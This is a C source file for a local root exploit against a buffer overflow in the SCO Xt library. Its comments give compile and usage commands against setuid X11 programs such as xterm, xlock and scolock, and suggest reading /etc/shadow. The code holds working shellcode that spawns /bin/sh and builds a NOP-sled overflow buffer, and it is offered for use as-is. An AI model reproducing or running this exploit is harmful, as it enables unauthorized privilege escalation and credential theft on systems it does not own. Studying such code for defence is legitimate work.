/*
 * Generic SCO Xt library overflow program by
 * Brock Tellier btellier@webley.com
 *
 * Tested on SCO 5.0.5+Skunkware98
 * All programs using the Xt library are believed vulnerable
 *
 *  Compile gcc -o sco_xt sco_xt.c
 *  Usage: /usr/bin/X11/scolock -bg `./sco_xt -9000 2000`
 *         /usr/bin/X11/xmcd -bg `./sco_xt -8500 2000`
 *         /usr/bin/X11/xlock -bg `./sco_xt -8500 2000`
 *         /usr/bin/X11/xterm -bg `./sco_xt -9000 2000`
 *
 * NOTE: xscreensaver and xload are vulnerable to the overflow
 *       but drop privs before the overflow occurs.  Of course,
 *       they were suid auth so that they could read /etc/shadow
 *       and thus your shellcode could exploit something along
 *       those lines.  I got shells out of them by doing:
 *
 *    /usr/bin/X11/xscreensaver -bg `./sco_xt -8404 2200`
 *    /usr/bin/X11/xload -bg `./sco_xt -8404 2200`
 */


#include <stdlib.h>
#include <stdio.h>

char scoshell[]= /* doble@iname.com */
  "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
  "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
  "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";


#define LEN 10000
#define NOP 0x90

unsigned long get_sp(void) {
  __asm__("movl %esp, %eax");
}


int main(int argc, char *argv[]) {
  long int offset=0;

  int i;
  int buflen = LEN;
  long int addr;
  char buf[LEN];

  if(argc < 3) {
   fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
   exit(0);
  }
  else {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);
  }

  addr=get_sp();

  fprintf(stderr, "Generic SCO Xt library overflow program\n");
  fprintf(stderr, "By Brock Tellier btellier@webley.com\n\n");
  fprintf(stderr, "Using addr: 0x%x\n", addr-offset);
  memset(buf,NOP,buflen);
  memcpy(buf+(buflen/2),scoshell,strlen(scoshell));

  for(i=((buflen/2) + strlen(scoshell))+4;i<buflen-4;i+=4)
   *(int *)&buf[i]=addr-offset;

  for(i=0;i<buflen;i++)
    putchar(buf[i]);

  exit(0);
}